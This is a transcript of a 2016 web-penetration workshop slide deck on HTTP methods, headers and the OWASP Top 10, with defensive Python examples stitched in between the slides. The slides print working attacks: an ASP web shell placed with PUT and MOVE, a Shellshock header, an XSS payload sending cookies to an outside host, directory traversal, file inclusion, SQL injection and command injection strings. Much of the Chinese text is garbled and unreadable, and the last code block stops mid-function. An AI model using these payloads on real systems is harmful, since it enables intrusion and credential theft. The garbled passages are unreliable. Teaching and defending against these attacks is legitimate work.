Web Penetration Techniques (Part 1)
Lionbug
October 01, 2016
The Declaration of Hacker (TDOH) WorkShop
Transcript
Web Penetration Techniques (Part 1) 2016/10/01 @ TDOH WorkShop LionBug
About Me • 讙紣Ռ̴a.k.a̴LionBug • 褾ੜ of TDOH • Co-founder
of UCCU • Know a little • Web Security
HTTP Hypertext Transfer Protocol
HTTPS Hypertext Transfer Protocol Secure
螀֢ܻቘ
Request & Response
HTTP Request
GET /index.php HTTP/1.1
Host: lionbug.tw
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Netcat or Telnet
Burp Suite
HTTP Request
HTTP GET Request: the GET /index.php request shown above.
HTTP POST Request
POST /login.php HTTP/1.1
…
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
<Enter>  (the empty line that separates the headers from the body)
username=admin&password=admin
HTTP Method
• GET
• POST
• HEAD
• OPTIONS
• PUT, DELETE, TRACE, MOVE …
HTTP OPTIONS Request
OPTIONS / HTTP/1.1
HOST: lionbug.tw

HTTP OPTIONS Request SUCCESS
HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/7.5
Public: OPTIONS, TRACE, GET, HEAD, POST
X-Powered-By: ASP.NET

HTTP OPTIONS Request Failed
HTTP/1.1 200 OK
Date: Thu, 29 Sep 2016 07:43:10 GMT
Server: Apache
HTTP PUT Request
PUT /shell.asp HTTP/1.1
HOST: lionbug.tw
Content-Length: 26

<%eval(request("cmd"))%>

HTTP PUT Request SUCCESS
HTTP/1.1 201 Created
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://lionbug.tw/shell.asp

HTTP PUT Request Failed
HTTP/1.1 404 Not Found

HTTP MOVE Request
MOVE /shell.txt HTTP/1.1
HOST: lionbug.tw
Destination: http://lionbug.tw/shell.asp

HTTP MOVE Request SUCCESS
HTTP/1.1 201 Created
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://lionbug.tw/shell.asp

HTTP MOVE Request Failed
HTTP/1.1 401 Unauthorized
WebDAV • MOVE shell.asp;.jpg • COPY shell.asp%00.jpg • NTFS稗褖 •
Ӿࢵኪמ礓羬ᕹWebDav笙၏膌 getshell
HTTP TRACE Request
TRACE /hello HTTP/1.1
HOST: lionbug.tw
Lion: bug

HTTP TRACE Request SUCCESS
HTTP/1.1 200 OK
…
TRACE /hello HTTP/1.1
HOST: lionbug.tw
Lion: bug

XST Cross-Site Tracing

HTTP TRACE Request
TRACE /<script>alert(1);<script> HTTP/1.1
HOST: lionbug.tw

HTTP TRACE Request SUCCESS
HTTP/1.1 200 OK
…
TRACE /<script>alert(1);<script> HTTP/1.1
HOST: lionbug.tw
HTTP TRACE Request • XST • Bypass httpOnly?
Try Bypass http://ctf.mis.nkfust.edu.tw/bypass01/
HTTP Request URI: the GET /index.php request shown above, with the URI in the request line highlighted.
HTTP Request URI
• /index.php
• /upload/
• /blog/1
• /index.php/blog/1
• ../../../../../etc/passwd
Django Directory Traversal
Try Bypass http://ctf.mis.nkfust.edu.tw/bypass02/
HTTP Request Version: the GET /index.php request shown above, with the HTTP/1.1 version in the request line highlighted.
HTTP Request Version • ଉ憎粚 • 1.0 • 1.1 •
Host • Connection: Keep-Alive • 2.0 • HTTP2.0ܐᦓᤩ฿4ӻṛܧ笙၏牧 ݢ膌๐ۓ瑊ૄმ(Freebuf)
HTTP Request Header: the GET /index.php request shown above, with the header lines highlighted.
Requests HOST • Host: lionbug.tw • HTTP 1.1 • VirtualHost
• …
Try Bypass http://ctf.mis.nkfust.edu.tw/bypass03/
Requests User-Agent • User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0;
rv:11.0) • 战ग़翕ᒊ螡䢔珊匍獉 • Shellshock (bash CVE-2014-6271) • () { :; }; ping -c 5 lionbug.tw • …
Requests Referer • Referer: http://lionbug.tw/index.php • …
Requests Accept 疑碢 • Accept: text/html; • Accept-Language: zh-TW,zh; •
Accept-Encoding: gzip, deflate • Accept-Ranges: bytes=0-1 • …
Requests Accept-Language • Accept-Language: zh-TW,zh; • …
Requests Accept-Ranges • Accept-Ranges: bytes=0-500 • Accept-Ranges: bytes=0-500,50-100 • CVE-2011-3192,
CVE-2015-1635(MS15-034) • …
Requests Cookie • Cookie: PHPSESSID=sess_3dd484f2bab6a2d 2509e9850dae3b897; • …
Requests X-Forwarded-For • X-Forwarded-For: 127.0.0.1 • …
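The header slides above (User-Agent carrying the Shellshock pattern, multi-range Range requests in the CVE-2011-3192 style, traversal in the URI, and X-Forwarded-For claiming 127.0.0.1) are what a request-inspection rule set looks for. The following is an added example, not code from the deck: a small Python inspector run over four constructed raw requests. Note that the header a client sends is Range; Accept-Ranges is the server's response header advertising range support. The sample requests, the MAX_RANGES threshold and the alert names are this example's own choices.

```python
import ipaddress
import re

# Constructed sample requests modelled on the deck's header slides (not captured traffic).
SAMPLE_REQUESTS = [
    "GET /index.php HTTP/1.1\r\nHost: lionbug.tw\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0)\r\n\r\n",
    "GET /cgi-bin/status HTTP/1.1\r\nHost: lionbug.tw\r\n"
    "User-Agent: () { :; }; ping -c 5 lionbug.tw\r\n\r\n",
    "GET /index.php HTTP/1.1\r\nHost: lionbug.tw\r\n"
    "Range: bytes=0-500,50-100,0-1,0-2,0-3,0-4,0-5,0-6\r\n\r\n",
    "GET /download.php?file=../../../../../etc/passwd HTTP/1.1\r\nHost: lionbug.tw\r\n"
    "X-Forwarded-For: 127.0.0.1\r\n\r\n",
]

SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")                  # "() {" function-definition prefix
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\|%2e%2e(?:%2f|/|\\))", re.I)
MAX_RANGES = 5   # constructed threshold; legitimate clients rarely ask for more than a few ranges


def parse_request(raw):
    """Split a raw request head into (method, target, version, headers); header names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, version, headers


def inspect_request(raw):
    """Return a list of alert strings for one request (empty list means nothing matched)."""
    method, target, version, headers = parse_request(raw)
    alerts = []
    # Shellshock: the pattern can arrive in any header that a CGI script exports as an env var.
    for name, value in headers.items():
        if SHELLSHOCK_RE.search(value):
            alerts.append("shellshock-pattern:" + name)
    if "range" in headers:
        spec = headers["range"].partition("=")[2]
        count = len([r for r in spec.split(",") if r.strip()])
        if count > MAX_RANGES:
            alerts.append("excessive-ranges:%d" % count)
    if TRAVERSAL_RE.search(target):
        alerts.append("path-traversal")
    # X-Forwarded-For is client-controlled unless it was set by a proxy you operate;
    # a loopback/private address in it is a classic attempt to pass an IP-based check.
    if "x-forwarded-for" in headers:
        for hop in headers["x-forwarded-for"].split(","):
            try:
                ip = ipaddress.ip_address(hop.strip())
            except ValueError:
                alerts.append("xff-malformed")
                continue
            if ip.is_loopback or ip.is_private:
                alerts.append("xff-internal-ip:" + str(ip))
    return alerts


def scan(requests):
    """Map request index -> alerts, so a batch (e.g. a pcap dump) can be triaged at once."""
    return {i: inspect_request(r) for i, r in enumerate(requests)}


if __name__ == "__main__":
    for i, alerts in scan(SAMPLE_REQUESTS).items():
        print(i, alerts or "clean")
```

The inspector looks at header values, not only User-Agent, because a CGI server exports most request headers into the environment the shell inherits; the X-Forwarded-For rule is only meaningful when the application is not behind a proxy you trust to overwrite that header.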
HTTP Response
HTTP Status Code
HTTP/1.1 200 OK
Date: Wed, 25 May 2016 11:48:22 GMT
Server: Apache
Content-Length: 72
Connection: close
Content-Type: text/html
HTTP Status Code • 1xx ૪ᤩ矑ݑ牧襑ᥝ媣媲蒂ቘ • 2xx ૪౮ۑᤩ֑๐瑊矑硩牏ቘ薹牏㪔矑ݑ •
3xx 制眲嘨አ㬵᯿碝疩ݻ牧盅媲ጱ藶穩֖࣎ • 4xx դ蔭ԧአ䜛ᒒ፡蚏㬵ݢ胼咳ኞԧ梊藮牧ঘ繸 ԧ֑๐瑊ጱ蒂ቘ • 5xx ֑๐瑊ࣁ蒂ቘ藶穩ጱ螂纷Ӿ磪梊藮ᘏ吖ଉ 制眲咳ኞ
HTTP Status Code • 200 OK • 3xx • 301
Moved Permanently • 302 Found • 4xx • 401 Unauthorized • 403 Forbidden • 500 Internal Server Error
HTTP Response Header: the 200 OK response shown above, with the header lines highlighted.
Response Server • Server: Apache/2.4.7 (Ubuntu) • Server: Microsoft-IIS/7.5 •
…
Response X-Powered-By • X-Powered-By: Flask/0.7.2 • X-Powered-By: ASP.NET • X-Powered-By:
PHP/5.5.9-1ubuntu4.19 • …
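The OPTIONS slides earlier in the deck (an IIS host advertising TRACE alongside the usual methods, an Apache host answering 200 without any Allow header) and the Server / X-Powered-By slides here are the two things a hardening review reads out of a response head. As an added example that is not part of the deck, the Python below parses a raw response head, lists the advertised methods and flags TRACE, the WebDAV write methods and banner headers. The two sample responses are rebuilt from the slides; RISKY_METHODS and FINGERPRINT_HEADERS are this example's own lists.

```python
import re

# Constructed from the deck's OPTIONS slides (not captured from a real host).
IIS_OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    "Server: Microsoft-IIS/7.5\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "\r\n"
)
APACHE_OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Thu, 29 Sep 2016 07:43:10 GMT\r\n"
    "Server: Apache\r\n"
    "\r\n"
)

# Methods a public site should not expose unless the application needs them:
# TRACE (cross-site tracing) and the write/WebDAV verbs behind the deck's PUT/MOVE slides.
RISKY_METHODS = {"PUT", "DELETE", "TRACE", "MOVE", "COPY", "MKCOL", "PROPFIND", "PROPPATCH", "LOCK", "UNLOCK"}
# Headers that leak product and version to anyone who asks.
FINGERPRINT_HEADERS = ("server", "x-powered-by", "x-aspnet-version")


def parse_response_head(raw):
    """Return (status_code, headers) for a raw response head; names lower-cased, repeats joined."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    m = re.match(r"HTTP/\d\.\d (\d{3})", lines[0])
    if not m:
        raise ValueError("not an HTTP response line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        name, value = name.strip().lower(), value.strip()
        headers[name] = headers[name] + ", " + value if name in headers else value
    return int(m.group(1)), headers


def allowed_methods(headers):
    """Union of the methods advertised in Allow and in IIS's non-standard Public header."""
    methods = set()
    for h in ("allow", "public"):
        if h in headers:
            methods.update(t.strip().upper() for t in headers[h].split(",") if t.strip())
    return methods


def audit_options_response(raw):
    """Findings a hardening review would record for one OPTIONS response."""
    status, headers = parse_response_head(raw)
    methods = allowed_methods(headers)
    findings = []
    if status == 200 and not methods:
        findings.append("OPTIONS answered 200 but no Allow/Public header: method list not disclosed")
    for m in sorted(methods & RISKY_METHODS):
        findings.append("risky method enabled: " + m)
    for h in FINGERPRINT_HEADERS:
        if h in headers:
            findings.append("banner: %s: %s" % (h, headers[h]))
    return findings


if __name__ == "__main__":
    for label, raw in (("IIS", IIS_OPTIONS_RESPONSE), ("Apache", APACHE_OPTIONS_RESPONSE)):
        print(label, audit_options_response(raw))
```

The advertised list is only what the server chooses to say; a server that answers 200 with no Allow header (the Apache case above) has not proven anything either way, which is why the audit records that as a finding rather than as "clean".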
HTTP Response Content HTTP/1.1 200 OK … <html> </html>
Try to find http://ctf.mis.nkfust.edu.tw/bypass05/
OWASP TOP 10 2013 ᤩ拻粋ጱ聲
๚涢挨ጱ疩ݻ • A10 - Unvalidated Redirects and Forwards • https://google.com/?redirect=http://lionbug.tw/ • https://google.com/?redirect=http%3A%2f%2flionbug.tw%2f
Unvalidated Redirects and Forwards https://bounty.github.com/classifications/unvalidated-redirect-or-forward.html
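The two redirect URLs on the slide differ only in encoding: the second one (http%3A%2f%2flionbug.tw%2f) is the same off-site target after percent-encoding, which is exactly the form that gets past a naive "does it start with http://" filter. As an added example that is not from the deck, here is a redirect validator in Python that decodes once, then accepts only same-site relative paths or absolute URLs whose host is on an allow-list; ALLOWED_HOSTS and the function names are this example's own.

```python
import urllib.parse

ALLOWED_HOSTS = {"google.com", "www.google.com"}   # constructed allow-list for the deck's google.com example


def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    """True only for a same-site path (/...) or an http(s) URL whose host is allow-listed."""
    # Decode once so http%3A%2f%2flionbug.tw%2f is judged as http://lionbug.tw/, not as a relative path.
    target = urllib.parse.unquote(target).strip()
    if not target or "\r" in target or "\n" in target:       # CRLF would split the Location header
        return False
    # Browsers treat backslashes like slashes in the authority, so "/\evil" is "//evil".
    parts = urllib.parse.urlsplit(target.replace("\\", "/"))
    if parts.scheme == "" and parts.netloc == "":
        # relative target: allow "/path" but not the scheme-relative "//host/path"
        return target.startswith("/") and not target.startswith("//")
    if parts.scheme not in ("http", "https"):                  # javascript:, data:, ...
        return False
    host = (parts.hostname or "").lower()                      # hostname drops user@ and :port
    return host in allowed_hosts


def choose_redirect(requested, fallback="/"):
    """What the handler for ?redirect= should actually send in Location."""
    return requested if is_safe_redirect(requested) else fallback


if __name__ == "__main__":
    for t in ("/account", "http://lionbug.tw/", "http%3A%2f%2flionbug.tw%2f", "//lionbug.tw/"):
        print("%-32s -> %s" % (t, choose_redirect(t)))
```

Comparing parts.hostname (not the raw string) is what defeats the https://google.com@lionbug.tw/ form, where the allow-listed name appears only as userinfo.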
ֵአ૪Ꭳ笙၏زկ • A9 - Using Components with Known Vulnerabilities •
ଉ憎笙၏ॺկ • FCKeditor, CKeditor • WordPress or Plugin • WPScan
ᒊٛݷ藶穩 • A8 – Cross Site Request Forgery (CSRF) •
藶穩ےӤtoken • 蝐抓牫᯿ᗝੂ嘨牫 • <img src="http://lionbug.tw/newpass?pass=123">
耬ۑ胼羷獨ጱਂ玲矒ګ • A7 – Missing Function Level Access Control •
/admin/upload.php • .git .svn • index.php~ • robots.txt
robots.txt
# robots.txt to deny the robots access
User-agent: *
Disallow: /admin
Disallow: /admin.ex
Disallow: /config
robots.txt • fb.me/robots.txt • www.dcard.tw/robots.txt • tw.yahoo.com/robots.txt
硵眤虻碘ู襷 • A6 – Sensitive Data Exposure • ੂ嘨 •
MD5牏SHA1牏DES • ก嘨㯽蜍
ੂ嘨ਂࣁCookieӾ
LinkedIn 癱ੂ丽笙 http://thehackernews.com/2016/05/linkedin-account-hack.html
dadada http://www.nydailynews.com/news/national/mark-zuckerberg-twitter-account-hacked-password-dadada-article-1.2662351
౯ጱੂ嘨䷱磪ےੂ 褾仡
EC-Council
EC-Council ?????????
犋吚ጱਞ獊奲眲戔ਧ • A5 – Security Misconfiguration • ୧ੂ嘨? admin? root?
1234? • port • 3306 mysql • 6379 redis • 8081 tomcat • …
犋ਞ獊ጱᇔկ㷢ᘍ • A4 – Insecure Direct Object References • ଘᤈ稗褖
• /?stuid=u9823001 • /cgpwd.php?username=admin&pass=1234 • /delete.php?id=123
ଘᤈ稗褖笙၏ A ݶ䋊 B ݶ䋊 C ݶ䋊 D ݶ䋊 Admin
Facebook Fixes Vulnerability That Led to Account Takeover, Pays Researcher $16K https://threatpost.com/facebook-fixes-vulnerability-that-led-to-account-takeover-pays-researcher-16k/120688/
Security Researcher Discovers Bug That Would Let Hackers Delete Any Photo Off Facebook https://techcrunch.com/2013/09/02/security-researcher-discovers-bug-that-would-let-hackers-delete-any-photo-off-facebook/
OpenFind Mail2000 犨᯿ᗝੂ嘨
狕硬㮆Ո虻碘 襑ᥝ戔ਧᒫԫמᓟ胼硩᯿ᗝמ
modify_id ??
౮ۑ᯿ᗝadminੂ嘨 https://zeroday.hitcon.org/vulnerability/ZD-2016-00031
犋吚ጱਞ獊奲眲戔ਧ • Directory Traversal • /download.php?file=123.pdf • /download.php?file=../../../../../etc/passwd • Local File Inclusion • /index.php?mod=news • <?php include($_GET['mod'].'.php'); ?>
犋吚ጱਞ獊奲眲戔ਧ • Remote File Inclusion • /index.php?mod=http://lionbug.tw/shell.php allow_url_fopen=On
WhatsApp LFI http://thehackernews.com/2013/06/Hacking-whatsapp-android-application.html
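Both slides above have the same root cause: a request parameter (file= or mod=) is joined onto a filesystem path and the joined value is never checked against the directory it was meant to stay in. As an added example that is not from the deck, the Python below shows the two standard fixes side by side: canonicalise the download path and require it to remain under the base directory, and resolve mod= through a fixed table instead of an include() on user input (the RFI case additionally needs allow_url_include=On on the PHP side; with that off, only local files are reachable). DOWNLOAD_ROOT and MODULES are constructed values for this example.

```python
import os
import urllib.parse

DOWNLOAD_ROOT = "/srv/app/files"                          # assumed base directory for ?file=
MODULES = {"news": "news.php", "about": "about.php"}      # hypothetical allow-list for ?mod=


def resolve_download(root, user_path):
    """Map a ?file= value onto a path under root; raise ValueError on any escape attempt."""
    decoded = urllib.parse.unquote(user_path)
    if decoded != urllib.parse.unquote(decoded):
        raise ValueError("double-encoded path: %r" % user_path)    # %252e%252e -> %2e%2e -> ..
    if "\x00" in decoded:
        raise ValueError("NUL byte in path: %r" % user_path)       # file%00.pdf truncation trick
    rel = decoded.replace("\\", "/")
    if rel.startswith("/"):
        raise ValueError("absolute path not allowed: %r" % user_path)
    root_real = os.path.realpath(root)
    # realpath collapses ../ segments and follows symlinks, so the containment test
    # is made on the path the OS would actually open, not on the string the client sent.
    candidate = os.path.realpath(os.path.join(root_real, rel))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise ValueError("path escapes %s: %r" % (root, user_path))
    return candidate


def is_safe_download(root, user_path):
    """Boolean wrapper for request handlers and tests."""
    try:
        resolve_download(root, user_path)
        return True
    except ValueError:
        return False


def resolve_module(mod):
    """?mod= never reaches include(); it only selects a file name from a fixed table."""
    if mod not in MODULES:
        raise ValueError("unknown module: %r" % mod)
    return MODULES[mod]


def is_known_module(mod):
    return mod in MODULES


if __name__ == "__main__":
    for p in ("123.pdf", "../../../../../etc/passwd", "..%2f..%2fetc%2fpasswd", "x%00.pdf"):
        print("%-30s %s" % (p, "ok" if is_safe_download(DOWNLOAD_ROOT, p) else "rejected"))
    for m in ("news", "http://lionbug.tw/shell.php"):
        print("%-30s %s" % (m, resolve_module(m) if is_known_module(m) else "rejected"))
```

The containment check is done after realpath on purpose: a check on the raw string ("does it contain ../") misses encoded and symlinked variants, while comparing canonical paths catches all of them with one rule.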
ᒊ脻纷ୗ硭䢗 • A3 – Cross-Site Scripting(XSS) • 硭䢗ਮ䜛ᒒ牫 • ࣁ獮ᒒ矠獈䘣դ嘨
•HTML牏CSS牏Javascript牏Flash …
ᒊ脻纷ୗ硭䢗 • 玱疤ࣳ • http://lionbug.tw/xss.php?msg=<script>alert(1);</script> • 㱪ਂࣳ • ᒍ獉 • …
碝窚盏玡Ӟ賳Flash XSSکXSS Worm https://www.leavesongs.com/HTML/sina-weibo-flashxss-worm.html
XSS 猂玲 Cookie
ᒊ脻纷ୗ硭䢗
<script>
var img = new Image();
img.src = 'http://lionbug.tw/' + document.cookie;
</script>
OpenFind Mail2000 Xss
• onclick 磦矦౮ xonclick • script 磦矦౮ scrips • html
݄ᴻ ?? OpenFind Mail2000
<html></html><<html></html>s<html></html>c<html></html>r<html></html>i<html></html>p<html></html>t<html></html>><html></html>a<html></html>l<html></html>e<html></html>r<html></html>t<html></html>(<html></html>'<html></html>x<html></html>s<html></html>s<html></html>'<html></html>)<html></html>;<html></html><<html></html>/<html></html>s<html></html>c<html></html>r<html></html>i<html></html>p<html></html>t<html></html>>
XSS Payload
OpenFind Mail2000 XSS
BeEF 吚㮆ૡٍՈ
XSS 犖胼盅ݣ
Try to find http://ctf.mis.nkfust.edu.tw/bypass06
०硳ጱ涢挨膏蝫娄ᓕቘ • A2 – Broken Authentication and Session Management •
Session and Cookie • Cookie • admin=0; • user=21232f297a57a5a743894a0e4a801fc3; • HMAC ?? • …
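The cookies on this slide (admin=0 and user=<md5 hex>; the hex shown is the MD5 of the string "admin") carry state the client can rewrite or recompute, which is the failure the "HMAC ??" bullet points at. The same keyed MAC also answers the CSRF slide earlier: a per-session token the forged <img src=...> request cannot know. As an added example that is not from the deck, the Python below shows the weak cookie beside a keyed version, the tamper check, the cookie flags, and a session-bound CSRF token; SECRET_KEY and the payload layout user|adminflag are this example's own choices.

```python
import hashlib
import hmac

SECRET_KEY = b"constructed-demo-secret-replace-me"   # assumed server-side key, never sent to the client


def legacy_user_cookie(username):
    """The deck's user=<hex> cookie: an unkeyed MD5 of the username, which anyone can compute."""
    return hashlib.md5(username.encode()).hexdigest()


def sign(value):
    """value.<hex HMAC-SHA256 of value>; without SECRET_KEY the tag cannot be forged."""
    tag = hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()
    return value + "." + tag


def verify(signed):
    """Return the payload if the tag checks out, else None; compare_digest avoids a timing leak."""
    value, sep, tag = signed.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(tag, expected) else None


def make_session_cookie(user, is_admin):
    return sign("%s|%d" % (user, 1 if is_admin else 0))


def read_session_cookie(cookie):
    """None for a missing or tampered tag; flipping admin=0 to 1 invalidates the cookie."""
    payload = verify(cookie)
    if payload is None:
        return None
    user, _, flag = payload.partition("|")
    return {"user": user, "admin": flag == "1"}


def set_cookie_header(name, value):
    """Flags for the deck's cookie-theft and XST slides: no script access, HTTPS only, no cross-site sends."""
    return "Set-Cookie: %s=%s; HttpOnly; Secure; SameSite=Lax; Path=/" % (name, value)


def csrf_token(session_cookie):
    """Per-session CSRF token derived from the session cookie; a forged request from another origin cannot carry it."""
    return hmac.new(SECRET_KEY, b"csrf:" + session_cookie.encode(), hashlib.sha256).hexdigest()


def csrf_valid(session_cookie, submitted):
    return hmac.compare_digest(csrf_token(session_cookie), submitted)


if __name__ == "__main__":
    print("legacy:", legacy_user_cookie("admin"))
    cookie = make_session_cookie("lin", False)
    print(set_cookie_header("session", cookie))
    print("genuine:", read_session_cookie(cookie))
    print("tampered:", read_session_cookie(cookie.replace("|0.", "|1.")))
    print("csrf ok:", csrf_valid(cookie, csrf_token(cookie)))
```

Keying is the whole point: the MD5 cookie "proves" nothing because the function is public, while the HMAC tag proves the server (holder of SECRET_KEY) issued that exact payload.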
襷ॠ笙၏ http://www.inside.com.tw/2015/08/21/ruten-security-issue
ဳ獈硭䢗 • A1 – Injection • ဳ獈圵觊 • SQL Injection
• Code Injection • Command Injection • LDAP Injection • …
SQL Injection
Select username, password From Member Where username = 'admin' and password = '1234'

user.php?id=1
SELECT id, name, password From member Where id = 1

id  name     password
1   admin    asdxcx
2   lin      5657
3   jhe      123
4   lionbug  qwe

user.php?id=1 or 1=1
SELECT id, name, password From member Where id = 1 Or 1=1
(the OR makes the condition true for every row, so all four rows come back)

Login
SELECT … Where name = 'admin' AND password = 'asdxcx'
(only the admin row matches)

Login
SELECT … Where name = 'admin' or 1 = 1 -- '' AND password = ''
(the injected quote closes the string, or 1 = 1 is always true, and -- comments out the password check, so every row matches)
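The two slides above are the same defect twice: the request value becomes part of the SQL text. As an added example that is not from the deck, the Python below rebuilds the member table in an in-memory SQLite database, runs the deck's two inputs through a vulnerable string-built query and through a parameterised one, and shows that the parameterised version returns nothing for "1 or 1=1" because the whole string is compared against id as a value rather than parsed as SQL. The table rows are copied from the slide; the function names are this example's own.

```python
import sqlite3

# Constructed copy of the deck's member table.
ROWS = [(1, "admin", "asdxcx"), (2, "lin", "5657"), (3, "jhe", "123"), (4, "lionbug", "qwe")]


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE member (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    db.executemany("INSERT INTO member VALUES (?, ?, ?)", ROWS)
    return db


def get_user_vulnerable(db, user_id):
    """The deck's user.php?id= pattern: the raw parameter is spliced into the SQL text."""
    return db.execute("SELECT id, name, password FROM member WHERE id = " + user_id).fetchall()


def get_user_safe(db, user_id):
    """Parameterised: '1 or 1=1' is compared to id as one value and can never match a row."""
    return db.execute("SELECT id, name, password FROM member WHERE id = ?", (user_id,)).fetchall()


def login_vulnerable(db, name, password):
    """The deck's login pattern: name and password are quoted by string formatting."""
    sql = "SELECT id, name FROM member WHERE name = '%s' AND password = '%s'" % (name, password)
    return db.execute(sql).fetchone()


def login_safe(db, name, password):
    """Parameterised: the quote and the -- comment in the name stay inside the value."""
    return db.execute(
        "SELECT id, name FROM member WHERE name = ? AND password = ?", (name, password)
    ).fetchone()


if __name__ == "__main__":
    db = fresh_db()
    print("vulnerable, id=1 or 1=1 ->", get_user_vulnerable(db, "1 or 1=1"))
    print("safe,       id=1 or 1=1 ->", get_user_safe(db, "1 or 1=1"))
    print("vulnerable login        ->", login_vulnerable(db, "admin' or 1=1 -- ", ""))
    print("safe login              ->", login_safe(db, "admin' or 1=1 -- ", ""))
```

Note that login_safe still compares plaintext passwords only because the slide's table stores them that way; a real login would compare a salted password hash, which is a separate fix from the injection one.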
Code Injection
• 纷ୗ嘨ဳ獈
• PHP: eval($_GET['code']);
• ASP: <%eval request("code")%>
Uber Remote Code Execution http://blog.orange.tw/2016/04/bug-bounty-uber-ubercom-remote-code_7.html
Command Injection
• 犤ဳ獈
• curl http://lionbug.tw
• curl http://lionbug.tw; ls -al
Google Command injection http://www.pranav-venkat.com/2016/03/command-injection-which-got-me-6000.html
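The curl slide above shows the mechanism: the URL is pasted into a command line, and the shell that parses that line treats ";" as a command separator. As an added example that is not from the deck, the Python below reproduces the vulnerable pattern with echo standing in for curl (so it runs offline; the shell parsing is identical), then shows the two fixes: pass an argv list so no shell is involved, and validate that the value is an http(s) URL with a plain host name before using it. It assumes a POSIX /bin/sh and /bin/echo; HOST_RE and the function names are this example's own.

```python
import re
import subprocess
import urllib.parse

HOST_RE = re.compile(r"^[A-Za-z0-9.-]+(:\d+)?$")   # host name, optional port, nothing a shell cares about


def run_vulnerable(url):
    """The deck's pattern: user input pasted into a shell command line."""
    return subprocess.run("echo " + url, shell=True, capture_output=True, text=True).stdout


def run_argv(url):
    """argv form: no shell parses the string, so the whole value is one literal argument."""
    return subprocess.run(["echo", url], capture_output=True, text=True).stdout


def is_valid_fetch_url(url):
    """Only http(s) URLs with a plain host[:port] authority are accepted."""
    p = urllib.parse.urlsplit(url)
    return p.scheme in ("http", "https") and p.hostname is not None and HOST_RE.match(p.netloc) is not None


def fetch(url):
    """Validation plus argv form: belt and braces, since each alone covers a different mistake."""
    if not is_valid_fetch_url(url):
        raise ValueError("refusing to fetch: %r" % url)
    return run_argv(url)


if __name__ == "__main__":
    tainted = "http://lionbug.tw; echo INJECTED"
    print("shell=True:", repr(run_vulnerable(tainted)))
    print("argv list :", repr(run_argv(tainted)))
    print("validated :", is_valid_fetch_url(tainted), is_valid_fetch_url("http://lionbug.tw"))
```

The argv form is the fix that holds even when validation is forgotten; validation is still worth keeping because curl itself accepts options and odd schemes, and a plain host-name check rules those out too.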
伛猋ૡ֢ • 蘷獨承 礍 羬翄 (wappalyzer) • 矊ፓ袅 (dirb) •
㯏礚 • subDomainsBrute • … • …
ଉ憎笙၏ڥአ • 犨Ӥ㯽笙၏ • LFI • SQL injection • …
犨Ӥ㯽笙၏ • 涢挨ොୗ • JS • FileName • Content-Type •
Header
JS 獮ᒒ涢挨
犨Ӥ㯽笙၏ • FileName • 123.jpg • 123.php%00.jpg • 123.jpg.php •
123.php?.jpg
犨Ӥ㯽笙၏ • Content-Type • image/jpeg • image/png • Header •
??
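The upload slides list the three things a checker can look at: the file name (123.php%00.jpg, 123.jpg.php, 123.php?.jpg), the client-sent Content-Type, and the bytes themselves. As an added example that is not from the deck, the Python below accepts an image only when the name has a single allow-listed extension, the bytes start with that format's signature, and no script marker appears in the data; it then stores the file under a random name so nothing user-controlled reaches the filesystem. Content-Type is checked but never trusted on its own. SIGNATURES, NAME_RE and the sample payloads are this example's own.

```python
import re
import secrets

# Extension -> file signature (magic bytes) the content must start with.
SIGNATURES = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n"}
# One base name, one extension: rejects 123.jpg.php, 123.php%00.jpg and 123.php?.jpg outright.
NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$")

# Constructed sample payloads.
JPEG_BYTES = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
PHP_BYTES = b"<?php echo 'hello'; ?>"


def check_upload(filename, content_type, data):
    """Return (ext, stored_name) for an acceptable image upload; raise ValueError otherwise."""
    if "\x00" in filename:
        raise ValueError("NUL byte in filename")
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]   # drop any directory part
    m = NAME_RE.match(name)
    if not m:
        raise ValueError("filename not of the form name.ext: %r" % filename)
    ext = m.group(1).lower()
    if ext == "jpeg":
        ext = "jpg"
    if ext not in SIGNATURES:
        raise ValueError("extension not allowed: ." + ext)
    # Content-Type is client-controlled: a mismatch is grounds to reject, a match proves nothing.
    if content_type.lower() not in ("image/jpeg", "image/png"):
        raise ValueError("unexpected Content-Type: %r" % content_type)
    if not data.startswith(SIGNATURES[ext]):
        raise ValueError("file signature does not match ." + ext)
    if b"<?" in data or b"<%" in data:                       # crude polyglot check (image with PHP/ASP inside)
        raise ValueError("script marker inside image data")
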